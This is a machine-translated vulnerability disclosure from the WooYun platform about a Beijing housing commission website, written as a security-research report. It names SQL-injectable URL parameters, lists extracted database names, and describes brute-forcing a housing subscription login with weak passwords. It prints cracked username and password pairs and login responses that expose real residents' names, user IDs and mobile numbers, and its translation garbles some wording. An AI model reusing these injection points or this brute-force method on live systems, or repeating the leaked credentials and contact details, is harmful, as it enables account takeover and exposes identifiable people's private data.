漏洞标题 北京市住房和建设委员会脆弱性一揽子计划(主站两次注射\爆破获取用户信息) 相关制造商 北京市住房和城乡建设委员会 漏洞作者 过路人 提交时间 2016-04-22 22: 40 公共时间 2016-06-10 19: 00 漏洞类型 应用配置错误 危险等级 高 自我评估等级 10 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 密码强度低 漏洞详细信息 http://**。**。**。**/tabid/2159/Default.aspx?ModelKey=SendInfo& Contract_qyh=Y1741851& Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC& Contract_Password=666666 Contract_qyh和Contract_Password 注射存在两个参数 前一个是Contract_mf注入点。由于没有进一步测试,最后一个被发送。经过测试,其他两个也有注射。
可用数据库[20]: [*]申请 [*] bjfdc [*] bjfdc_for_auditburea [*] bjfdc_tax [*] bjhouse [*] bjhouse_application [*] bjrema [*] 数据中心 [*]图 [*] jianceshi [*]主人 [*]模型 [*] msdb 政策公寓 [*] real_estate_analyse [*] real_estate_analyse_bak [*] real_estate_analyseImportdata [*] tempdb [*] ttib [*] vk 漏洞证明: http://**。**。**。**/enroll/home.jsp 自住商品房在线订阅系统,验证码无用,大量用户弱密码,只测试top500用户名,密码被采用 123456,111111,000000,用户名等 413lironglirong200falsefalse546 352zhangjingzhangjing200falsefalse547 159wangningwangning200falsefalse549 329wanglongwanglong200falsefalse551 379liuyuyingliuyuying200falsefalse551 478zhangkunzhangkun200falsefalse551 76wangyulanwangyulan200falsefalse553 400zhanglijuanzhanglijuan200falsefalse553 404liguixiangliguixiang200falsefalse554 270wangshuzhenwangshuzhen200falsefalse557 173zhangfengyingzhangfengying200falsefalse559 1041lixia123456200falsefalse543 1312lixiumei123456200falsefalse552 686chenfang111111200falsefalse553 1943wangjinfeng000000200falsefalse556 1075zhangguiying123456200falsefalse560
{'flag': 1,'message':'登录成功! ','data': {'id':'54016','people_name':'Li Rong','username':'lirong','email':'287084850@**.**.**.** ','mobile':'15510318399'},'redirectUrl': null} {'flag': 1,'message':'登录成功! ','data': {'id':'12033','people_name':'Zhang Jing','username':'zhangjing','email':'6032561@**.**.**.** ','mobile':'13801623808'},'redirectUrl': null} {'flag': 1,'message':'登录成功! ','data': {'id':'46693','people_name':'Wang Ning','username':'wangning','email':'casio0018@**.**.**.** ','mobile':'13521143322'},'redirectUrl': null} {'flag': 1,'message':'登录成功! ','data': {'id':'30169','people_name':'Wing Long','username':'wanglong','email':'wl_post@**.**.**.** ','mobile':'13810447522'},'redirectUrl': null} 修理计划: 注入问题content_可能在其他地方,检查出来 第二个系统处理验证码并提醒用户更改密码。 版权声明:请注明出处。居民A @乌云